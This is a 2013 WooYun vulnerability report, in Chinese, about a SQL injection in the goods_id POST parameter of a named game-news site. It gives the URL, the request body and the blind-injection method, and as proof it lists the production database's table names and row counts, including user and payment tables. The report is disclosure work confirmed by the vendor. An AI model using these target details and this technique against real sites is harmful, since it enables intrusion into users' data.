当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043288

漏洞标题:雨林木风旗下111G游戏资讯网SQL注入漏洞

相关厂商:广东雨林木风计算机科技有限公司

漏洞作者: xiaoL

提交时间:2013-11-19 10:40

修复时间:2014-01-03 10:40

公开时间:2014-01-03 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-19: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2014-01-03: 细节向公众公开

简要描述:

看着秋风人家都发一坨了,我也跟风找一下。不负所望!
求别忽略!别浇灭我那幼小的心灵!
求大大审核!

详细说明:

get是不是被广大同学找光了。
简单粗暴post型
地址:http://www.111g.com/?ct=product&do=do
goods_id存在注入
提交数据是这样的.....
total=668888&goods_id=108&number=1&market_price=668888
bool的盲注速度还是不错的。

漏洞证明:

未避免和秋风撞衫
我列一些不同的数据出来,还是最喜欢的count

888.png


Database: 111g
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| access_pv | 3977966 |
| access_ip | 2391745 |
| 115_user_assign | 332685 |
| histories | 128396 |
| tongji_reg | 96223 |
| notify_logs | 71148 |
| cards | 66039 |
| pay_exceptions | 65987 |
| cms_article | 49979 |
| cms_article_linktmp | 20389 |
| 115_login_000 | 19909 |
| 115_login_005 | 19823 |
| 115_login_001 | 19774 |
| 115_login_003 | 19766 |
| 115_login_007 | 19755 |
| 115_login_002 | 19730 |
| 115_login_004 | 19702 |
| 115_user_00 | 19688 |
| 115_user_details_00 | 19686 |
| 115_login_006 | 19680 |
| 115_user_03 | 19664 |
| 115_user_details_03 | 19662 |
| 115_user_01 | 19654 |
| 115_user_details_01 | 19653 |
| 115_user_04 | 19617 |
| 115_user_details_04 | 19615 |
| 115_user_02 | 19524 |
| 115_user_details_02 | 19523 |
| pay_order | 6104 |
| pay_history | 3139 |
| pay_recharge | 3139 |
| country | 2719 |
| cms_tags | 1228 |
| alarm_logs | 573 |
| error_logs | 573 |
| register_log | 567 |
| feixin_accounts | 530 |
| users_login_history | 401 |
| city | 367 |
| advertisement | 341 |
| indextj_news | 101 |
| indextj_image | 63 |
| servers | 51 |
| canal | 38 |
| login_log | 38 |
| active | 37 |
| province | 31 |
| cms_site_urls | 27 |
| orders | 27 |
| cms_servers | 22 |
| product | 14 |
| links | 12 |
| games | 10 |
| users_admin_log | 7 |
| test | 6 |
| tongji | 5 |
| cms_linghao | 4 |
| bread | 2 |
| tongji_login | 2 |
| users | 2 |
| users_purview_config | 2 |
+----------------------+---------+

修复方案:

过滤吧骚年!

版权声明:转载请注明来源 xiaoL@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-19 10:44

厂商回复:

非常感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-19 11:10 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    卧槽。给这么多?

  2. 2013-11-19 11:21 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    我的。。。走了小厂商。。。。还带一忽略!